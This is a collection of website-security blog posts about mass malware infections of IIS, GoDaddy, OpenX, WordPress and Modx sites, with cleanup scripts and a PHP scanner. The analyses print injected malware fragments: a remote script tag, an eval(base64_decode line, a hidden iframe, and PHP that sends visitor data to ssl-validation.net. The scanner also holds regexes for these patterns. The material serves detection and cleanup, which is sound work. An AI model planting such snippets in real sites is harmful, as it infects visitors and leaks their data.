Attack against IIS/ASP sites – google-stat50.info

A large number of sites have been hacked again in the last few days with a malware script pointing to google-stat50.info (and google-stats50.info). Not only small sites, but some big ones got hit as well. It is the same SQL injection attack that was used in the robint-us mass infection a few months ago.

What do all these sites have in common? They are all hosted on IIS servers, using ASP.net and are vulnerable to SQL injection.

How many sites got infected? According to Google, at least 1,500 sites got hacked and blacklisted, but the number is a lot bigger, since not all the sites got checked by Google:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1577 domain(s), including asianpopcorn.com/, koreanmovie.com/, golfyou.net/.



GoDaddy hacked – Fixing the “headers already sent” error

As you saw over the last few days, various sites at GoDaddy were exploited causing lots of complaints on Twitter and in other places about GoDaddy security.

Well, today, many of those sites were reinfected (again) and GoDaddy tried to fix them automatically. However, their scripts failed for some reason, leaving some sites with empty lines at the top of the PHP files, which causes these errors to show up:

Warning: Cannot modify header information – headers already sent by (output started at..

So, if your sites are showing these errors, just run this script:

http://sucuri.net/malware/helpers/clear_php.txt

(right click – save as clear_php.txt, rename to clear.php and upload via FTP to your site. Open your browser and execute it as yoursite.com/clear.php).

That should fix these issues. If you need any help, contact us at http://sucuri.net/support
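The clear_php.txt helper is not reproduced on this page, so here is an added example (not Sucuri's script) of the same repair: it strips the stray blank lines and whitespace that precede the opening `<?php` tag, which is what PHP sends as output before any `header()` call. It only touches files whose first real content is the PHP open tag, so templates that legitimately start with HTML are left alone.

```python
import os

# Constructed sample: a PHP file whose automated cleanup left blank lines
# before the opening tag. PHP emits those lines as output, so the later
# header() call fails with "headers already sent".
BROKEN_PHP = "\n\n   \n<?php\nheader('Content-Type: text/html');\necho 'hello';\n"

def strip_leading_whitespace(source: str) -> str:
    """Remove whitespace (and a UTF-8 BOM) that precedes the first '<?php' tag.

    Files whose first non-blank content is not the PHP open tag (plain HTML
    templates, for example) are returned unchanged.
    """
    stripped = source.lstrip("\ufeff \t\r\n")
    if stripped.startswith("<?php"):
        return stripped
    return source

def fix_file(path: str) -> bool:
    """Rewrite one file in place; return True if anything was changed."""
    with open(path, "r", encoding="utf-8", errors="surrogateescape") as fh:
        original = fh.read()
    fixed = strip_leading_whitespace(original)
    if fixed == original:
        return False
    with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
        fh.write(fixed)
    return True

def fix_tree(root: str) -> list:
    """Apply fix_file to every .php file under root; return the paths changed."""
    changed = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                if fix_file(path):
                    changed.append(path)
    return changed
```

Run `fix_tree("/path/to/webroot")` from a backup first and diff the result; the function reports exactly which files it rewrote.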

GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber

We can now confirm there is an undetermined number of sites hosted at GoDaddy that have been attacked and exploited. Our research shows this is an ongoing issue that started within the last couple of hours.

All the sites we’ve seen so far contain the following javascript added to all PHP files:

<script src="http://myblindstudioinfoonline.com/ll.php"

This tag is generated by a very long eval(base64_decode line:

eval(base64_decode("aWYoZnVuY3Rpb....

Here is the malware entry our scanner is detecting:




OpenX users – Time to upgrade

*Note that openx.org is currently offline, so we recommend disabling it until you can upgrade.
**We are mirroring version 2.8.7 here: http://sucuri.net/openx-2.8.7.tar.gz if you don’t want to wait until openx is back online.
***If your site is hacked/blacklisted and you need help, email us at support@sucuri.net

If you are using OpenX, make sure to upgrade it to the latest version (2.8.7) as soon as possible.

Older versions have a known vulnerability that is being exploited in the wild.

This is the announcement from the OpenX team (their site is offline, so I am copying it here):

Security is an important priority at OpenX and we’re constantly working to provide security patches and bug fixes as soon as we become aware of any potential issue. As these issues are discovered, we validate, patch and release as quickly as we can. But it’s important to understand that avoiding potential security issues also requires server administrators to be vigilant and upgrade their systems to new, patched versions as soon as they become available.

It has been brought to our attention that there is a vulnerability in the 2.8 downloadable version of OpenX that can result in a server running the downloaded version of OpenX being compromised. We have already closed this vulnerability with the latest version of our software. To avoid this issue, we recommend that all users immediately upgrade their systems to 2.8.7.

You can download the new version here: http://www.openx.org/ad-server/download (also offline, but hopefully it will be back soon).

Example of malware being used in the wild: http://sucuri.net/malware/entry/MW:IFRAME:HD36

If you can’t upgrade, make sure to delete the following file: admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

We will post more details as we learn.

Blackhat SEO Spam C&C: wseow and seotoos up to no good!

We have been tracking these Blackhat SEO Spam C&C (command and control) servers for a while and thought it would be a good time to expose some of the details.

They have been actively trying to exploit blogs using old versions of WordPress to use them as part of their spam network.

IP addresses used:
94.75.221.117
94.75.221.118

Malware being used:
On the sites we’ve analyzed so far, wp-settings.php and index.php are hacked to load the SPAM, and to serve as a backdoor to the attackers.

This is the code added to the bottom of wp-settings.php:

http://sucuri.net/?page=tools&title=blacklist&detail=fe7b3ef5bba0429150672dfea5a66109


ASIS International Website Blacklisted by Google

The official website (asisonline.org) of ASIS International, a major physical security association, was hacked and blacklisted yesterday. Add another case to the list of sites using outdated and/or vulnerable applications. In the case of ASIS, they were running a vulnerable version of OpenX (ad server software) and the attackers injected malicious code into it.

Anyone visiting the ASIS website has ads served from ads.asisonline.org which is the culprit. The ad server is loading malware from: hxxp://liyerfit.com/blogs/martin/. The malware string can be detected using our scanner.




Success Magazine Blog Hit With Malware

We were analyzing some hacked sites today and one of them was full of SPAM. After some digging, we found that it was loading the Blackhat SEO Spam from blog.success.com (the official blog of Success Magazine).

A quick scan of their blog shows that it is being used to load all sorts of Pharma goodness:

[Screenshot: Success spam]


Modx and the new gcounter.cn attack

Quick malware update. See all the latest ones here.

We have lately been seeing many sites running Modx that are infected with malware loaded from the file /manager/includes/document.parser.class.inc.php.

We don’t know yet how the sites are being hacked, but the interesting thing is that all of them are being “managed” by gcounter.cn (a famous malware site).

Basically, a large block of code is added to the bottom of that file that calls gcounter.cn to ask which malicious iframe to send to the end user. Gcounter then responds with the one to load:

< i frame src="http://sslsite.in/x/?src=Sirius&id=zerling&o=o" style="display:none">



Malware update – ssl-validation.net

Quick malware update: The site ssl-validation.net (nice name) is being used to distribute SEO spam and malware (the famous fake AV, say it ain't so).

You can get details of the code being used here: http://sucuri.net/?page=tools&title=blacklist&detail=7ea73e3ac775b52b945d5b45a5abb7ad

$outsourceurl="http://ssl-validation.net/gt.php?site=".urlencode($_SERVER['HTTP_HOST']).'&page='.urlencode($_SERVER['REQUEST_URI']).'&ip='.urlencode($_SERVER['REMOTE_ADDR']).'&agent='.urlencode($_SERVER['HTTP_USER_AGENT']);
$links = base64_decode(file_get_contents($outsourceurl));

Most of the time, it is inserting an eval(base64_decode inside the template-loader.php file from WordPress.
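The injections described in this post and in the GoDaddy post above share three tells: an `eval(base64_decode(` line, a `base64_decode(file_get_contents(` fetch from a remote host, and visitor data from `$_SERVER` concatenated onto an external URL. The following added example (not Sucuri's scanner) greps PHP files for those patterns; the sample file content is constructed and the base64 payload is shortened to a placeholder.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed sample modelled on the infected template-loader.php above.
# The base64 payload is a shortened placeholder, not the real blob.
SAMPLE_TEMPLATE_LOADER = r"""<?php
/* WordPress template loader */
$outsourceurl = "http://ssl-validation.net/gt.php?site=" . urlencode($_SERVER['HTTP_HOST']);
$links = base64_decode(file_get_contents($outsourceurl));
eval(base64_decode("aWYoZnVuY3Rpb..."));
if ( is_404() ) { include( get_404_template() ); }
"""

# Each pattern is one indicator of the injection style discussed on this page.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("eval of base64 payload",
     re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)),
    ("remote fetch into base64_decode",
     re.compile(r"base64_decode\s*\(\s*file_get_contents\s*\(", re.I)),
    ("request data sent to external URL",
     re.compile(r"[\"']https?://[^\"']+[\"']\s*\.\s*urlencode\s*\(\s*\$_SERVER", re.I)),
]

def scan_php_source(source: str) -> List[Tuple[int, str]]:
    """Return (line_number, indicator_name) for every line that matches an indicator."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((lineno, name))
    return hits

def scan_tree(root: str) -> Dict[str, List[Tuple[int, str]]]:
    """Scan every .php file under root; map each file with hits to its hit list."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
                if hits:
                    report[path] = hits
    return report
```

Treat a hit as a lead for manual review rather than proof: some legitimate plugins also call base64_decode, but eval of a decoded blob in a core file such as template-loader.php or wp-settings.php is not expected.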

The malicious site is hosted at 95.211.108.146.

Suggestion for hosting companies: Block this IP.

Malware update – seconeo.com,secowo.com,etc

We will be posting some quick malware updates on our blog from now on. If your WordPress site got hacked with malware from any of these domains:

http://ae.awaue.com
http://ie.eracou.com
http://ao.euuaw.com
http://aeaaea.com/ou
http://secree.com/re
http://uoauer.com/si
http://oeooea.com/ve
http://secowo.com/wo
http://ouroue.com/se

In addition to removing the malicious code from the database (wp_posts table), you also need to remove an admin user that was added as part of this attack. It can have many names: JordanK, JoshuaH, MikeM, BettyJ, etc.

The way to identify the malicious user is that its password hash will be set to $P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/ and the creation date will be set to 0000-00-00 00:00:00.

The following SQL will fix it up:

delete from wp_users where user_pass = '$P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/' AND user_registered = '0000-00-00 00:00:00';
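As an added example (not part of the original post), the check below applies the two indicators above to wp_users rows and builds the cleanup statements by primary key. It goes beyond the post in two ways: a zero registration date is flagged on its own, so a variant with a different password hash is still caught, and the matching wp_usermeta rows (where WordPress stores the role) are deleted too rather than left orphaned. The sample rows are constructed.

```python
from typing import Dict, List, Tuple

# Indicators taken from the post above.
KNOWN_BAD_HASH = "$P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/"
ZERO_DATE = "0000-00-00 00:00:00"

# Constructed sample of wp_users rows; real rows would come from the database.
SAMPLE_USERS: List[Dict] = [
    {"ID": 1, "user_login": "admin", "user_pass": "$P$Bexampleofalegitimatehash",
     "user_registered": "2009-05-01 10:00:00"},
    {"ID": 7, "user_login": "JordanK", "user_pass": KNOWN_BAD_HASH,
     "user_registered": ZERO_DATE},
    {"ID": 8, "user_login": "BettyJ", "user_pass": "$P$Bsomeotherattackerhash",
     "user_registered": ZERO_DATE},
]

def find_rogue_users(rows: List[Dict]) -> List[Tuple[int, str, List[str]]]:
    """Return (ID, login, reasons) for every row matching at least one indicator."""
    flagged = []
    for row in rows:
        reasons = []
        if row["user_pass"] == KNOWN_BAD_HASH:
            reasons.append("known attacker password hash")
        if row["user_registered"] == ZERO_DATE:
            reasons.append("zero registration date")
        if reasons:
            flagged.append((row["ID"], row["user_login"], reasons))
    return flagged

def cleanup_sql(flagged: List[Tuple[int, str, List[str]]]) -> List[str]:
    """Build DELETE statements keyed on the IDs found, so no other row is touched."""
    if not flagged:
        return []
    ids = ",".join(str(user_id) for user_id, _, _ in flagged)
    return [
        f"DELETE FROM wp_users WHERE ID IN ({ids});",
        f"DELETE FROM wp_usermeta WHERE user_id IN ({ids});",
    ]
```

Review the flagged list before running the statements; a legitimate account should never carry a zero registration date, but confirming the logins takes seconds.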

We will be posting more details as we get them.

If your site is hacked and you need help, visit http://sucuri.net to learn about our malware removal and monitoring plans.